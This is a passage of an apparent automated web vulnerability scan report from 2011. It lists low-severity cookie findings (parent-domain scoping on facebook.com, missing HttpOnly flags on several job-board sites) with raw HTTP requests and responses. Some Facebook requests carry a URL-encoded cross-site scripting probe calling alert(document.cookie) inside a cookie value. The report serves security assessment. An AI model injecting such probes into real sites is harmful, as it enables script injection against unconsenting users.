Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:30 GMT
Content-Length: 56415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

9.25. http://www.facebook.com/piyush.v.bhatt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /piyush.v.bhatt

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /piyush.v.bhatt HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=WABbM; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:40 GMT
Content-Length: 20984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

9.26. http://www.facebook.com/profile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=pcnfa; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:32 GMT
Content-Length: 0


9.27. http://www.facebook.com/yahoonews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /yahoonews

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /yahoonews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=cDsiN; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 19:34:35 GMT
Content-Length: 31924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10. Cookie without HttpOnly flag set
There are 446 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://www.100kcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.100kcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4gi6e55n6c5ims48r8g0gv1692; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106106

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.2. http://www.accountingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.accountingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m8i6cd531h6rsd383n5t999356; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116767

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.3. http://www.accountmanagementcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.accountmanagementcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bvhhpa1stegtb9iluknr76tt84; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 137270

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.4. http://www.actuarialcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.actuarialcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gfsjuvk6a0eja28o52r05s3445; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114356

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.5. http://www.admincrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.admincrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9hecq37ajcfirr9ve90dobkne6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109804

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.6. http://www.advertisingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advertisingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4vstlithvj0cev5m57soav4bi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.7. http://www.aerospacecrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aerospacecrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=smekqvtb2jtrk9a1sqbg5kk4u3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.8. http://www.agriculturalcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.agriculturalcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukabttsk8nejv6h58lpcqprfk1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102618

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.9. http://www.aharrisonbarnes.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aharrisonbarnes.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:47 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=4quu0rekl19krf2nje0ll9eoh4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648507; expires=Sat, 21-Jan-2012 22:21:47 GMT; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91358

<script>
function ValidatorTrim_video(s)
{
var m = s.match(/^\s*(\S+(\s+\S+)*)\s*$/);
return (m == null) ? "" : m[1];
}

function checkEmail_video(strng)
{
   var error = "";
   if (strng == "")

...[SNIP]...

10.10. http://www.aharrisonbarnes.com/contact-us/script/functions.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aharrisonbarnes.com
Path:   /contact-us/script/functions.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact-us/script/functions.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 22 Jan 2011 00:17:06 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
